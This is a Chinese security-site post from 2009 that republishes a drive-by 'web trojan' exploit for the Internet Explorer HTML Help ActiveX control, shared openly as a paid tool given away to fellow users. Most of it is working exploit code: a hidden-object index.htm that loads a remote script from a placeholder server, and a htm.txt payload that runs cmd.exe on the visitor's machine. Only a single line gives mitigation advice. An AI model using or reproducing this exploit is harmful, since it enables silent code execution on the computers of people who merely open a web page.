黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

最新Help ActiveX控件网页木马

2009-2-4 02:53| 投稿: security

摘要: 这个东西很多人拿来卖钱,听说要1500 RMB,嘿嘿! 现在我把它贴出来,给火狐的弟兄分享。在winxp xp2 下成功! 当然如果你的windows 没有在c盘的话,就一定会失败!  最后...

免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。

这个东西很多人拿来卖钱,听说要1500 RMB,嘿嘿! 现在我把它贴出来,给火狐的弟兄分享。在winxp xp2 下成功! 当然如果你的windows 没有在c盘的话,就一定会失败!  最后谢谢 蓝魔~~~                                                                  ---- by 浩天大侠 This unpatched vulnerability is a variant of the "Auto SP2 RC Exploit"Solution : Set the security level for all zones to "High" in Internet Explorer//  index.htm  //<html><head></head><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:_"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm"></OBJECT><OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Button" value="Text:_"><PARAM name="Window" value="$global_blank"><PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://server//htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'></OBJECT><script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)</script></body></html>//  htm.txt  //document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");// Original Advisory  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT网站,本文由投稿者转载自互联网,文末已注明出处,其内容和图片版权归原作者所有,文中所述不代表本站观点,若有侵权或转载不当之处请从网站右下角联系我们处理。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部